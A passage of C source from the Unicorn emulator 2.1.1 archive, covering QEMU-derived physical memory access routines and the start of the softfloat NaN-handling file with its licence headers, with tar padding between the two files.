*uc = cpu->uc; #endif int asidx = cpu_asidx_from_attrs(cpu, attrs); CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx]; AddressSpaceDispatch *d = cpuas->memory_dispatch; MemoryRegionSection *sections = d->map.sections; return §ions[index & ~TARGET_PAGE_MASK]; } static void io_mem_init(struct uc_struct *uc) { memory_region_init_io(uc, &uc->io_mem_unassigned, &unassigned_mem_ops, NULL, UINT64_MAX); } AddressSpaceDispatch *address_space_dispatch_new(struct uc_struct *uc, FlatView *fv) { AddressSpaceDispatch *d = g_new0(AddressSpaceDispatch, 1); #ifndef NDEBUG uint16_t n; n = dummy_section(uc, &d->map, fv, &(uc->io_mem_unassigned)); assert(n == PHYS_SECTION_UNASSIGNED); #else dummy_section(uc, &d->map, fv, &(uc->io_mem_unassigned)); #endif d->phys_map = (PhysPageEntry) { .ptr = PHYS_MAP_NODE_NIL, .skip = 1 }; d->uc = uc; return d; } void address_space_dispatch_free(AddressSpaceDispatch *d) { phys_sections_free(&d->map); g_free(d); } static void tcg_commit(MemoryListener *listener) { CPUAddressSpace *cpuas; AddressSpaceDispatch *d; /* since each CPU stores ram addresses in its TLB cache, we must reset the modified entries */ cpuas = container_of(listener, CPUAddressSpace, tcg_as_listener); cpu_reloading_memory_map(); /* The CPU and TLB are protected by the iothread lock. * We reload the dispatch pointer now because cpu_reloading_memory_map() * may have split the RCU critical section. */ d = address_space_to_dispatch(cpuas->as); cpuas->memory_dispatch = d; tlb_flush(cpuas->cpu); } static uint64_t unassigned_io_read(struct uc_struct *uc, void* opaque, hwaddr addr, unsigned size) { #ifdef _MSC_VER return (uint64_t)0xffffffffffffffffULL; #else return (uint64_t)-1ULL; #endif } static void unassigned_io_write(struct uc_struct *uc, void* opaque, hwaddr addr, uint64_t data, unsigned size) { } static const MemoryRegionOps unassigned_io_ops = { .read = unassigned_io_read, .write = unassigned_io_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static void memory_map_init(struct uc_struct *uc) { uc->system_memory = g_malloc(sizeof(*(uc->system_memory))); memory_region_init(uc, uc->system_memory, UINT64_MAX); address_space_init(uc, &uc->address_space_memory, uc->system_memory); uc->system_io = g_malloc(sizeof(*(uc->system_io))); memory_region_init_io(uc, uc->system_io, &unassigned_io_ops, NULL, 65536); address_space_init(uc, &uc->address_space_io, uc->system_io); } /* physical memory access (slow version, mainly for debug) */ static void invalidate_and_set_dirty(MemoryRegion *mr, hwaddr addr, hwaddr length) { } static int memory_access_size(MemoryRegion *mr, unsigned l, hwaddr addr) { unsigned access_size_max = mr->ops->valid.max_access_size; /* Regions are assumed to support 1-4 byte accesses unless otherwise specified. */ if (access_size_max == 0) { access_size_max = 4; } /* Bound the maximum access by the alignment of the address. */ if (!mr->ops->impl.unaligned) { #ifdef _MSC_VER unsigned align_size_max = addr & (0ULL - addr); #else unsigned align_size_max = addr & -addr; #endif if (align_size_max != 0 && align_size_max < access_size_max) { access_size_max = align_size_max; } } /* Don't attempt accesses larger than the maximum. */ if (l > access_size_max) { l = access_size_max; } l = pow2floor(l); return l; } static bool prepare_mmio_access(MemoryRegion *mr) { return true; } /* Called within RCU critical section. */ static MemTxResult flatview_write_continue(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr) { uint8_t *ram_ptr; uint64_t val; MemTxResult result = MEMTX_OK; bool release_lock = false; const uint8_t *buf = ptr; for (;;) { if (!memory_access_is_direct(mr, true)) { release_lock |= prepare_mmio_access(mr); l = memory_access_size(mr, l, addr1); /* XXX: could force current_cpu to NULL to avoid potential bugs */ val = ldn_he_p(buf, l); result |= memory_region_dispatch_write(uc, mr, addr1, val, size_memop(l), attrs); } else { /* RAM case */ ram_ptr = qemu_ram_ptr_length(fv->root->uc, mr->ram_block, addr1, &l, false); memcpy(ram_ptr, buf, l); } if (release_lock) { release_lock = false; } len -= l; buf += l; addr += l; if (!len) { break; } l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, true, attrs); } return result; } /* Called from RCU critical section. */ static MemTxResult flatview_write(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { hwaddr l; hwaddr addr1; MemoryRegion *mr; MemTxResult result = MEMTX_OK; l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, true, attrs); result = flatview_write_continue(uc, fv, addr, attrs, buf, len, addr1, l, mr); return result; } /* Called within RCU critical section. */ MemTxResult flatview_read_continue(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *ptr, hwaddr len, hwaddr addr1, hwaddr l, MemoryRegion *mr) { uint8_t *ram_ptr; uint64_t val; MemTxResult result = MEMTX_OK; bool release_lock = false; uint8_t *buf = ptr; for (;;) { if (!memory_access_is_direct(mr, false)) { /* I/O case */ release_lock |= prepare_mmio_access(mr); l = memory_access_size(mr, l, addr1); result |= memory_region_dispatch_read(uc, mr, addr1, &val, size_memop(l), attrs); stn_he_p(buf, l, val); } else { /* RAM case */ ram_ptr = qemu_ram_ptr_length(fv->root->uc, mr->ram_block, addr1, &l, false); memcpy(buf, ram_ptr, l); } if (release_lock) { release_lock = false; } len -= l; buf += l; addr += l; if (!len) { break; } l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, false, attrs); } return result; } /* Called from RCU critical section. */ static MemTxResult flatview_read(struct uc_struct *uc, FlatView *fv, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { hwaddr l; hwaddr addr1; MemoryRegion *mr; l = len; mr = flatview_translate(uc, fv, addr, &addr1, &l, false, attrs); return flatview_read_continue(uc, fv, addr, attrs, buf, len, addr1, l, mr); } MemTxResult address_space_read_full(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; FlatView *fv; if (len > 0) { fv = address_space_to_flatview(as); result = flatview_read(as->uc, fv, addr, attrs, buf, len); } return result; } MemTxResult address_space_write(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { MemTxResult result = MEMTX_OK; FlatView *fv; if (len > 0) { fv = address_space_to_flatview(as); result = flatview_write(as->uc, fv, addr, attrs, buf, len); } return result; } MemTxResult address_space_rw(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, void *buf, hwaddr len, bool is_write) { if (is_write) { return address_space_write(as, addr, attrs, buf, len); } else { return address_space_read_full(as, addr, attrs, buf, len); } } bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, void *buf, hwaddr len, bool is_write) { MemTxResult result = address_space_rw(as, addr, MEMTXATTRS_UNSPECIFIED, buf, len, is_write); if (result == MEMTX_OK) { return true; } else { return false; } } enum write_rom_type { WRITE_DATA, FLUSH_CACHE, }; static inline MemTxResult address_space_write_rom_internal(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *ptr, hwaddr len, enum write_rom_type type) { hwaddr l; uint8_t *ram_ptr; hwaddr addr1; MemoryRegion *mr; const uint8_t *buf = ptr; while (len > 0) { l = len; mr = address_space_translate(as, addr, &addr1, &l, true, attrs); if (!memory_region_is_ram(mr)) { l = memory_access_size(mr, l, addr1); } else { /* ROM/RAM case */ ram_ptr = qemu_map_ram_ptr(as->uc, mr->ram_block, addr1); switch (type) { case WRITE_DATA: memcpy(ram_ptr, buf, l); break; case FLUSH_CACHE: flush_icache_range((uintptr_t)ram_ptr, (uintptr_t)ram_ptr + l); break; } } len -= l; buf += l; addr += l; } return MEMTX_OK; } /* used for ROM loading : can write in RAM and ROM */ MemTxResult address_space_write_rom(AddressSpace *as, hwaddr addr, MemTxAttrs attrs, const void *buf, hwaddr len) { return address_space_write_rom_internal(as, addr, attrs, buf, len, WRITE_DATA); } void cpu_flush_icache_range(AddressSpace *as, hwaddr start, hwaddr len) { } void cpu_exec_init_all(struct uc_struct *uc) { /* The data structures we set up here depend on knowing the page size, * so no more changes can be made after this point. * In an ideal world, nothing we did before we had finished the * machine setup would care about the target page size, and we could * do this much later, rather than requiring board models to state * up front what their requirements are. */ finalize_target_page_bits(uc); memory_map_init(uc); io_mem_init(uc); } static bool flatview_access_valid(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs) { MemoryRegion *mr; hwaddr l, xlat; while (len > 0) { l = len; mr = flatview_translate(uc, fv, addr, &xlat, &l, is_write, attrs); if (!memory_access_is_direct(mr, is_write)) { l = memory_access_size(mr, l, addr); if (!memory_region_access_valid(uc, mr, xlat, l, is_write, attrs)) { return false; } } len -= l; addr += l; } return true; } bool address_space_access_valid(AddressSpace *as, hwaddr addr, hwaddr len, bool is_write, MemTxAttrs attrs) { FlatView *fv; bool result; fv = address_space_to_flatview(as); result = flatview_access_valid(as->uc, fv, addr, len, is_write, attrs); return result; } static hwaddr flatview_extend_translation(struct uc_struct *uc, FlatView *fv, hwaddr addr, hwaddr target_len, MemoryRegion *mr, hwaddr base, hwaddr len, bool is_write, MemTxAttrs attrs) { hwaddr done = 0; hwaddr xlat; MemoryRegion *this_mr; for (;;) { target_len -= len; addr += len; done += len; if (target_len == 0) { return done; } len = target_len; this_mr = flatview_translate(uc, fv, addr, &xlat, &len, is_write, attrs); if (this_mr != mr || xlat != base + done) { return done; } } } /* Map a physical memory region into a host virtual address. * May map a subset of the requested range, given by and returned in *plen. * May return NULL if resources needed to perform the mapping are exhausted. * Use only for reads OR writes - not for read-modify-write operations. * Use cpu_register_map_client() to know when retrying the map operation is * likely to succeed. */ void *address_space_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write, MemTxAttrs attrs) { hwaddr len = *plen; hwaddr l, xlat; MemoryRegion *mr; void *ptr; FlatView *fv; struct uc_struct *uc = as->uc; if (len == 0) { return NULL; } l = len; fv = address_space_to_flatview(as); mr = flatview_translate(uc, fv, addr, &xlat, &l, is_write, attrs); if (!memory_access_is_direct(mr, is_write)) { /* Avoid unbounded allocations */ l = MIN(l, TARGET_PAGE_SIZE); mr->uc->bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l); mr->uc->bounce.addr = addr; mr->uc->bounce.len = l; mr->uc->bounce.mr = mr; if (!is_write) { flatview_read(as->uc, fv, addr, MEMTXATTRS_UNSPECIFIED, mr->uc->bounce.buffer, l); } *plen = l; return mr->uc->bounce.buffer; } *plen = flatview_extend_translation(as->uc, fv, addr, len, mr, xlat, l, is_write, attrs); ptr = qemu_ram_ptr_length(as->uc, mr->ram_block, xlat, plen, true); return ptr; } /* Unmaps a memory region previously mapped by address_space_map(). * Will also mark the memory as dirty if is_write is true. access_len gives * the amount of memory that was actually read or written by the caller. */ void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len) { if (buffer != as->uc->bounce.buffer) { MemoryRegion *mr; ram_addr_t addr1; mr = memory_region_from_host(as->uc, buffer, &addr1); assert(mr != NULL); if (is_write) { invalidate_and_set_dirty(mr, addr1, access_len); } return; } if (is_write) { address_space_write(as, as->uc->bounce.addr, MEMTXATTRS_UNSPECIFIED, as->uc->bounce.buffer, access_len); } qemu_vfree(as->uc->bounce.buffer); as->uc->bounce.buffer = NULL; } void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, hwaddr *plen, bool is_write) { return address_space_map(as, addr, plen, is_write, MEMTXATTRS_UNSPECIFIED); } void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, bool is_write, hwaddr access_len) { address_space_unmap(as, buffer, len, is_write, access_len); } #define ARG1_DECL AddressSpace *as #define ARG1 as #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX UNICORN_ARCH_POSTFIX #else #define SUFFIX #endif #define TRANSLATE(...) address_space_translate(as, __VA_ARGS__) #include "memory_ldst.inc.c" /* Called from RCU critical section. This function has the same * semantics as address_space_translate, but it only works on a * predefined range of a MemoryRegion that was mapped with * address_space_cache_init. */ static inline MemoryRegion *address_space_translate_cached( MemoryRegionCache *cache, hwaddr addr, hwaddr *xlat, hwaddr *plen, bool is_write, MemTxAttrs attrs) { MemoryRegionSection section; MemoryRegion *mr; IOMMUMemoryRegion *iommu_mr; AddressSpace *target_as; assert(!cache->ptr); *xlat = addr + cache->xlat; mr = cache->mrs.mr; iommu_mr = memory_region_get_iommu(mr); if (!iommu_mr) { /* MMIO region. */ return mr; } section = address_space_translate_iommu(iommu_mr, xlat, plen, NULL, is_write, true, &target_as, attrs); return section.mr; } #define ARG1_DECL MemoryRegionCache *cache #define ARG1 cache #ifdef UNICORN_ARCH_POSTFIX #define SUFFIX glue(_cached_slow, UNICORN_ARCH_POSTFIX) #else #define SUFFIX _cached_slow #endif #define TRANSLATE(...) address_space_translate_cached(cache, __VA_ARGS__) #include "memory_ldst.inc.c" /* virtual memory access for debug (includes writing to ROM) */ int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, void *ptr, target_ulong len, bool is_write) { #ifdef TARGET_ARM struct uc_struct *uc = cpu->uc; #endif hwaddr phys_addr; target_ulong l, page; uint8_t *buf = ptr; while (len > 0) { int asidx; MemTxAttrs attrs; page = addr & TARGET_PAGE_MASK; phys_addr = cpu_get_phys_page_attrs_debug(cpu, page, &attrs); asidx = cpu_asidx_from_attrs(cpu, attrs); /* if no physical page mapped, return an error */ if (phys_addr == -1) return -1; l = (page + TARGET_PAGE_SIZE) - addr; if (l > len) l = len; phys_addr += (addr & ~TARGET_PAGE_MASK); if (is_write) { address_space_write_rom(cpu->cpu_ases[asidx].as, phys_addr, attrs, buf, l); } else { address_space_read(cpu->cpu_ases[asidx].as, phys_addr, attrs, buf, l); } len -= l; buf += l; addr += l; } return 0; } /* * Allows code that needs to deal with migration bitmaps etc to still be built * target independent. */ size_t qemu_target_page_size(struct uc_struct *uc) { return TARGET_PAGE_SIZE; } int qemu_target_page_bits(struct uc_struct *uc) { return TARGET_PAGE_BITS; } int qemu_target_page_bits_min(void) { return TARGET_PAGE_BITS_MIN; } bool target_words_bigendian(void) { #if defined(TARGET_WORDS_BIGENDIAN) return true; #else return false; #endif } bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr) { MemoryRegion*mr; hwaddr l = 1; bool res; mr = address_space_translate(as, phys_addr, &phys_addr, &l, false, MEMTXATTRS_UNSPECIFIED); res = !memory_region_is_ram(mr); return res; } /* * Unmap pages of memory from start to start+length such that * they a) read as 0, b) Trigger whatever fault mechanism * the OS provides for postcopy. * The pages must be unmapped by the end of the function. * Returns: 0 on success, none-0 on failure * */ int ram_block_discard_range(struct uc_struct *uc, RAMBlock *rb, uint64_t start, size_t length) { int ret = -1; uint8_t *host_startaddr = rb->host + start; if (!QEMU_PTR_IS_ALIGNED(host_startaddr, rb->page_size)) { //error_report("ram_block_discard_range: Unaligned start address: %p", // host_startaddr); goto err; } if ((start + length) <= rb->used_length) { bool need_madvise; if (!QEMU_IS_ALIGNED(length, rb->page_size)) { //error_report("ram_block_discard_range: Unaligned length: %zx", // length); goto err; } errno = ENOTSUP; /* If we are missing MADVISE etc */ /* The logic here is messy; * madvise DONTNEED fails for hugepages * fallocate works on hugepages and shmem */ need_madvise = (rb->page_size == uc->qemu_host_page_size); if (need_madvise) { /* For normal RAM this causes it to be unmapped, * for shared memory it causes the local mapping to disappear * and to fall back on the file contents (which we just * fallocate'd away). */ #if defined(CONFIG_MADVISE) ret = madvise(host_startaddr, length, MADV_DONTNEED); if (ret) { ret = -errno; //error_report("ram_block_discard_range: Failed to discard range " // "%s:%" PRIx64 " +%zx (%d)", // rb->idstr, start, length, ret); goto err; } #else ret = -ENOSYS; //error_report("ram_block_discard_range: MADVISE not available" // "%s:%" PRIx64 " +%zx (%d)", // rb->idstr, start, length, ret); goto err; #endif } } else { //error_report("ram_block_discard_range: Overrun block '%s' (%" PRIu64 // "/%zx/" RAM_ADDR_FMT")", // rb->idstr, start, length, rb->used_length); } err: return ret; } bool ramblock_is_pmem(RAMBlock *rb) { return rb->flags & RAM_PMEM; } void page_size_init(struct uc_struct *uc) { /* NOTE: we can always suppose that qemu_host_page_size >= TARGET_PAGE_SIZE */ if (uc->qemu_host_page_size == 0) { uc->qemu_host_page_size = uc->qemu_real_host_page_size; } if (uc->qemu_host_page_size < TARGET_PAGE_SIZE) { uc->qemu_host_page_size = TARGET_PAGE_SIZE; } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/fpu/�����������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014745�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/fpu/softfloat-specialize.inc.c���������������������������������������������������0000664�0000000�0000000�00000110064�14675241067�0022012�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source fragment is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ /* Define for architectures which deviate from IEEE in not supporting * signaling NaNs (so all NaNs are treated as quiet). */ #if defined(TARGET_XTENSA) #define NO_SIGNALING_NANS 1 #endif /* Define how the architecture discriminates signaling NaNs. * This done with the most significant bit of the fraction. * In IEEE 754-1985 this was implementation defined, but in IEEE 754-2008 * the msb must be zero. MIPS is (so far) unique in supporting both the * 2008 revision and backward compatibility with their original choice. * Thus for MIPS we must make the choice at runtime. */ static inline flag snan_bit_is_one(float_status *status) { #if defined(TARGET_MIPS) return status->snan_bit_is_one; #elif defined(TARGET_HPPA) || defined(TARGET_UNICORE32) || defined(TARGET_SH4) return 1; #else return 0; #endif } /*---------------------------------------------------------------------------- | For the deconstructed floating-point with fraction FRAC, return true | if the fraction represents a signalling NaN; otherwise false. *----------------------------------------------------------------------------*/ static bool parts_is_snan_frac(uint64_t frac, float_status *status) { #ifdef NO_SIGNALING_NANS return false; #else flag msb = extract64(frac, DECOMPOSED_BINARY_POINT - 1, 1); return msb == snan_bit_is_one(status); #endif } /*---------------------------------------------------------------------------- | The pattern for a default generated deconstructed floating-point NaN. *----------------------------------------------------------------------------*/ static FloatParts parts_default_nan(float_status *status) { bool sign = 0; uint64_t frac; #if defined(TARGET_SPARC) || defined(TARGET_M68K) /* !snan_bit_is_one, set all bits */ frac = (1ULL << DECOMPOSED_BINARY_POINT) - 1; #elif defined(TARGET_I386) || defined(TARGET_X86_64) \ || defined(TARGET_MICROBLAZE) /* !snan_bit_is_one, set sign and msb */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 1); sign = 1; #elif defined(TARGET_HPPA) /* snan_bit_is_one, set msb-1. */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 2); #else /* This case is true for Alpha, ARM, MIPS, OpenRISC, PPC, RISC-V, * S390, SH4, TriCore, and Xtensa. I cannot find documentation * for Unicore32; the choice from the original commit is unchanged. * Our other supported targets, CRIS, LM32, Moxie, Nios2, and Tile, * do not have floating-point. */ if (snan_bit_is_one(status)) { /* set all bits other than msb */ frac = (1ULL << (DECOMPOSED_BINARY_POINT - 1)) - 1; } else { /* set msb */ frac = 1ULL << (DECOMPOSED_BINARY_POINT - 1); } #endif return (FloatParts) { .cls = float_class_qnan, .sign = sign, .exp = INT_MAX, .frac = frac }; } /*---------------------------------------------------------------------------- | Returns a quiet NaN from a signalling NaN for the deconstructed | floating-point parts. *----------------------------------------------------------------------------*/ static FloatParts parts_silence_nan(FloatParts a, float_status *status) { #ifdef NO_SIGNALING_NANS g_assert_not_reached(); #elif defined(TARGET_HPPA) a.frac &= ~(1ULL << (DECOMPOSED_BINARY_POINT - 1)); a.frac |= 1ULL << (DECOMPOSED_BINARY_POINT - 2); #else if (snan_bit_is_one(status)) { return parts_default_nan(status); } else { a.frac |= 1ULL << (DECOMPOSED_BINARY_POINT - 1); } #endif a.cls = float_class_qnan; return a; } /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision NaN. *----------------------------------------------------------------------------*/ floatx80 floatx80_default_nan(float_status *status) { floatx80 r; /* None of the targets that have snan_bit_is_one use floatx80. */ assert(!snan_bit_is_one(status)); #if defined(TARGET_M68K) r.low = UINT64_C(0xFFFFFFFFFFFFFFFF); r.high = 0x7FFF; #else /* X86 */ r.low = UINT64_C(0xC000000000000000); r.high = 0xFFFF; #endif return r; } /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision inf. *----------------------------------------------------------------------------*/ #define floatx80_infinity_high 0x7FFF #if defined(TARGET_M68K) #define floatx80_infinity_low UINT64_C(0x0000000000000000) #else #define floatx80_infinity_low UINT64_C(0x8000000000000000) #endif const floatx80 floatx80_infinity = make_floatx80_init(floatx80_infinity_high, floatx80_infinity_low); /*---------------------------------------------------------------------------- | Raises the exceptions specified by `flags'. Floating-point traps can be | defined here if desired. It is currently not possible for such a trap | to substitute a result value. If traps are not implemented, this routine | should be simply `float_exception_flags |= flags;'. *----------------------------------------------------------------------------*/ void float_raise(uint8_t flags, float_status *status) { status->float_exception_flags |= flags; } /*---------------------------------------------------------------------------- | Internal canonical NaN format. *----------------------------------------------------------------------------*/ typedef struct { flag sign; uint64_t high, low; } commonNaNT; /*---------------------------------------------------------------------------- | Returns 1 if the half-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float16_is_quiet_nan(float16 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float16_is_any_nan(a_); #else uint16_t a = float16_val(a_); if (snan_bit_is_one(status)) { return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); } else { return ((a & ~0x8000) >= 0x7C80); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the half-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float16_is_signaling_nan(float16 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint16_t a = float16_val(a_); if (snan_bit_is_one(status)) { return ((a & ~0x8000) >= 0x7C80); } else { return (((a >> 9) & 0x3F) == 0x3E) && (a & 0x1FF); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is a quiet | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float32_is_quiet_nan(float32 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return float32_is_any_nan(a_); #else uint32_t a = float32_val(a_); if (snan_bit_is_one(status)) { return (((a >> 22) & 0x1FF) == 0x1FE) && (a & 0x003FFFFF); } else { return ((uint32_t)(a << 1) >= 0xFF800000); } #endif } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is a signaling | NaN; otherwise returns 0. *----------------------------------------------------------------------------*/ int float32_is_signaling_nan(float32 a_, float_status *status) { #ifdef NO_SIGNALING_NANS return 0; #else uint32_t a = float32_val(a_); if (snan_bit_is_one(status)) { return ((uint32_t)(a << 1) >= 0xFF800000); } else { return (((a >> 22) & 0x1FF) == 0x1FE) && (a & 0x003FFFFF); } #endif } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point NaN | `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid | exception is raised. *----------------------------------------------------------------------------*/ static commonNaNT float32ToCommonNaN(float32 a, float_status *status) { commonNaNT z; if (float32_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); } z.sign = float32_val(a) >> 31; z.low = 0; z.high = ((uint64_t)float32_val(a)) << 41; return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the canonical NaN `a' to the single- | precision floating-point format. *----------------------------------------------------------------------------*/ static float32 commonNaNToFloat32(commonNaNT a, float_status *status) { uint32_t mantissa = a.high >> 41; if (status->default_nan_mode) { return float32_default_nan(status); } if (mantissa) { return make_float32( (((uint32_t)a.sign) << 31) | 0x7F800000 | (a.high >> 41)); } else { return float32_default_nan(status); } } /*---------------------------------------------------------------------------- | Select which NaN to propagate for a two-input operation. | IEEE754 doesn't specify all the details of this, so the | algorithm is target-specific. | The routine is passed various bits of information about the | two NaNs and should return 0 to select NaN a and 1 for NaN b. | Note that signalling NaNs are always squashed to quiet NaNs | by the caller, by calling floatXX_silence_nan() before | returning them. | | aIsLargerSignificand is only valid if both a and b are NaNs | of some kind, and is true if a has the larger significand, | or if both a and b have the same significand but a is | positive but b is negative. It is only needed for the x87 | tie-break rule. *----------------------------------------------------------------------------*/ static int pickNaN(FloatClass a_cls, FloatClass b_cls, flag aIsLargerSignificand) { #if defined(TARGET_ARM) || defined(TARGET_MIPS) || defined(TARGET_HPPA) /* ARM mandated NaN propagation rules (see FPProcessNaNs()), take * the first of: * 1. A if it is signaling * 2. B if it is signaling * 3. A (quiet) * 4. B (quiet) * A signaling NaN is always quietened before returning it. */ /* According to MIPS specifications, if one of the two operands is * a sNaN, a new qNaN has to be generated. This is done in * floatXX_silence_nan(). For qNaN inputs the specifications * says: "When possible, this QNaN result is one of the operand QNaN * values." In practice it seems that most implementations choose * the first operand if both operands are qNaN. In short this gives * the following rules: * 1. A if it is signaling * 2. B if it is signaling * 3. A (quiet) * 4. B (quiet) * A signaling NaN is always silenced before returning it. */ if (is_snan(a_cls)) { return 0; } else if (is_snan(b_cls)) { return 1; } else if (is_qnan(a_cls)) { return 0; } else { return 1; } #elif defined(TARGET_PPC) || defined(TARGET_XTENSA) || defined(TARGET_M68K) /* PowerPC propagation rules: * 1. A if it sNaN or qNaN * 2. B if it sNaN or qNaN * A signaling NaN is always silenced before returning it. */ /* M68000 FAMILY PROGRAMMER'S REFERENCE MANUAL * 3.4 FLOATING-POINT INSTRUCTION DETAILS * If either operand, but not both operands, of an operation is a * nonsignaling NaN, then that NaN is returned as the result. If both * operands are nonsignaling NaNs, then the destination operand * nonsignaling NaN is returned as the result. * If either operand to an operation is a signaling NaN (SNaN), then the * SNaN bit is set in the FPSR EXC byte. If the SNaN exception enable bit * is set in the FPCR ENABLE byte, then the exception is taken and the * destination is not modified. If the SNaN exception enable bit is not * set, setting the SNaN bit in the operand to a one converts the SNaN to * a nonsignaling NaN. The operation then continues as described in the * preceding paragraph for nonsignaling NaNs. */ if (is_nan(a_cls)) { return 0; } else { return 1; } #else /* This implements x87 NaN propagation rules: * SNaN + QNaN => return the QNaN * two SNaNs => return the one with the larger significand, silenced * two QNaNs => return the one with the larger significand * SNaN and a non-NaN => return the SNaN, silenced * QNaN and a non-NaN => return the QNaN * * If we get down to comparing significands and they are the same, * return the NaN with the positive sign bit (if any). */ if (is_snan(a_cls)) { if (is_snan(b_cls)) { return aIsLargerSignificand ? 0 : 1; } return is_qnan(b_cls) ? 1 : 0; } else if (is_qnan(a_cls)) { if (is_snan(b_cls) || 